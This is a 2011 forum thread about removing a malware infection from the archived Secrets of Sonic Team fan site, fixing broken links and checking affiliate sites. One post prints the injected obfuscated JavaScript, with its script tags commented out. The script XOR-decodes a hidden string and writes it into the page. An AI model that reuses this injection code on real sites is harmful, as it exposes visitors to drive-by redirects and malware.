don't click here

SOST Clean-up Project

Discussion in 'General Sonic Discussion' started by NO CARRIER, Oct 29, 2011.

  1. NO CARRIER

    NO CARRIER

    Oldbie
    51
    9
    8
    USA
    As many of you are aware, whenever you access the old Secrets of Sonic Team (SOST) website (sost.emulationzone.org), a warning message is displayed indicating that the site is infected with malware. This weekend, I will start going through the website with the goal of purging the rogue script from the infected files. I'll post a follow-up message once this has been completed.

    While I am doing that, now would be good time to address any other issues with the website. This includes:
    - broken links
    - pages with scripting / permission errors
    - pages with glaring mistakes

    If there is anything you would like to see fixed, please reply to this thread and I'll try to correct it.

    Thanks

    PS: I have no intention of reopening the site, so please don't ask. I simply want to get the site back in an operational state.
     
  2. JaxTH

    JaxTH

    Pudding Deity Oldbie
    10,355
    586
    93
    Los Angeles
    Jack shit.
    Geez, I haven't been to SOST in ages.
     
  3. NO CARRIER

    NO CARRIER

    Oldbie
    51
    9
    8
    USA
    Does anyone have any recommendations for an FTP client that can sync a local folder structure against a remote server?

    Thanks
     
  4. Tweaker

    Tweaker

    Banned
    12,387
    2
    0
    FileZilla works well for that; it displays both your folder trees side by side. It doesn't do any automatic synchronization that I'm aware of, but it makes it easy to do it manually.
     
  5. ICEknight

    ICEknight

    Researcher Researcher
    Nice to see you're getting rid of that malware, that site's a nice thing to preserve clean.

    Like that link to my site's old address! :v:
     
  6. Tamkis

    Tamkis

    Banned
    116
    0
    0
    Pennsylvania
    Megaman 2: The Robotnik Wars, Unnamed S3&K hack
    Ahh.. so that's why I was redirected to a another website when I recently visited SOST. I visited before the warning existed, in order to try look up some scans on the Sonic CD manual/box art. Thanks for posting about this; imma be scanning my computer for possible viruses, just in case, I caught something when I last visited.
     
  7. Cooljerk

    Cooljerk

    NotEqual Tech, Inc - VR & Game Dev Oldbie
    4,505
    201
    43
    I made this offer already years ago at this point and it still stands: I would totally be willing to maintain the site if you'd reopen it.
     
  8. Yuzu

    Yuzu

    Member
    2,548
    51
    28
    That'd be amazing if you did, SOST was the first scene website I ever visited back when we first got the internet in late 2003/early 2004 and the website was great for the information.

    I'd help out as well if it relaunched as I have a lot more free time now as I have to wait for the second stage approval before I can go school over here.
     
  9. Blue Emerald

    Blue Emerald

    Teleportation, yeah! Member
    1,923
    5
    18
    TBD
    That virus was the reason I haven't been to SOST in ages. =P

    'Course, now that I think about it, I probably could've accessed it on my iPod the whole time without any problems. D'oh.
     
  10. Black Squirrel

    Black Squirrel

    no reverse gear Wiki Sysop
    8,544
    2,465
    93
    Northumberland, UK
    steamboat wiki
    The problem is, if you start fixing mistakes you'll suddenly end up adding pieces of information found by the community in the x number of years since SOST closed. I.e. you'll be repeating some of the aims of Sonic Retro's wiki. I'm pretty sure everything meaningful from SOST is mirrored here.

    Certainly worth purging it of that malware though.
     
  11. NO CARRIER

    NO CARRIER

    Oldbie
    51
    9
    8
    USA
    Please provide location of page link (URL) along with incorrect and correct info.

    That's is true, which is the reason why I am not interested in restarting the SOST page. Sonic Retro has done a excellent job in compiling "Sonic Secrets" information collected over the past decade, so there is no need to repeat their efforts.

    Instead, I am interested in correcting "gross" mistakes. Ex: "Here's a picture of Eggman" when it's really a pic of, say, Sonic.

    SOST, for the most part, is now in "archival" form. But if any parts of it are broken, I'd like to fix them. Ex: there are links to Sonic Adventure beta video clips that are broken, but the content is on the site. I'll be addressing that.
     
  12. ICEknight

    ICEknight

    Researcher Researcher
    Oh. It's on the right column of the home page. There's a link to sonicdatabase.tk instead of sonicdatabase.com. =|
     
  13. NO CARRIER

    NO CARRIER

    Oldbie
    51
    9
    8
    USA
    Good news: the Wowtribes malware infect has been removed! :specialed:

    The rouge script impacted over 200 files. Please check out the site and let me know if there are any locations I might have missed.

    I also examined the links under "affiliates" and noticed some issues:
    IceKnight: I fixed the link to SonicDataBase.com

    Sonicology - http://sonicology.fateback.com/
    Was the site discontinued or do they have a new link?

    S2Beta - http://www.s2beta.com/
    Leads to a generic ISP page. Was the site discontinued?

    DigiBase - http://sonicveg.digibase.ca/
    Leads to a blank page. Was the site discontinued?
     
  14. Spanner

    Spanner

    The Tool Member
    The website is on http://s2beta.sonicretro.org now, although the content is also available on the Sonic Retro wiki.
     
  15. NO CARRIER

    NO CARRIER

    Oldbie
    51
    9
    8
    USA
    I'll remove the link to the S2Beta page since a link to Sonic Retro is all encompassing.
     
  16. ICEknight

    ICEknight

    Researcher Researcher
    Hey, good work. And thanks for fixing the link. :)
     
  17. NO CARRIER

    NO CARRIER

    Oldbie
    51
    9
    8
    USA
    No problem.
     
  18. Sik

    Sik

    Sik is pronounced as "seek", not as "sick". Tech Member
    6,718
    1
    0
    being an asshole =P
    This is still reported as malware, though it may be just cached.

    How do we know if the script is there, how does it look like in the HTML source code?
     
  19. NO CARRIER

    NO CARRIER

    Oldbie
    51
    9
    8
    USA
    Try hitting refresh, or press the "control" key while hitting the refresh button to force the browser to download the file(s). The Sonic 1 page is reported as clean by Chrome for me.

    As for the malware, some virus or worm gained access to the Apache webserver and injected a javascript function into numerous web pages on the server. Many sites, not just SOST, were impacted. SOST was the most difficult for me to address because I don't have a copy of the original site prior to the infection.

    A copy of the script that was injected is below. I converted the "script" tags to comments so it would not run.

    <!-- script -->function jIxnUrxy(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(jIxnUrxy()>100000){window.name=3884595755666519495547423784526814254729275736776229961339682363787169177551228741637751728945214929;var rVwKZEnt='%u0032%u000e%u0067%u0001%u0073%u0012%u007f%u001a%u003a%u004d%u0024%u0040%u0034%u005c%u0061%u0050%u0070%u0018%u007d%u0014%u0073%u001b%u006f%u0052%u0063%u0043%u0021%u004e%u003c%u0058%u003d%u004f%u0072%u0042%u0062%u0004%u0076%u0017%u007a%u001f%u007d%u0012%u0060%u0004%u0061%u0013%u002e%u001e%u003e%u004d%u003f%u005c%u0061%u0046%u002e%u005a%u002e%u005e%u0064%u004b%u0064%u0013%u007c%u000b%u007f%u000d%u0064%u0006%u0063%u0010%u003e%u005d%u0032%u005f%u0070%u001c%u0073%u0014%u0067%u0048%u0021%u004f%u002b%u004e%u0036%u0018%u0068%u0000%u0070%u0057%u0069%u0055%u007a%u0013%u0075%u0007%u0066%u000b%u006e%u0050';var gDFWvB=unescape(rVwKZEnt);FWjdPIg=window.name;for(QqsUFCi=0;QqsUFCi<gDFWvB.length-1;QqsUFCi++){mJAFZuhRe=gDFWvB.charCodeAt(QqsUFCi);document.write(String.fromCharCode( (gDFWvB.charCodeAt(QqsUFCi+1)-0) ^ mJAFZuhRe) );}}<!-- /script -->
     
  20. Overlord

    Overlord

    Now playable in Smash Bros Ultimate Moderator
    19,218
    965
    93
    Long-term happiness
    I never actually visited Sonic Vegemite at all, but is http://sonicveg.com/ the same site?

    Digibase itself is still at http://www.digibase.ca , as it always has been.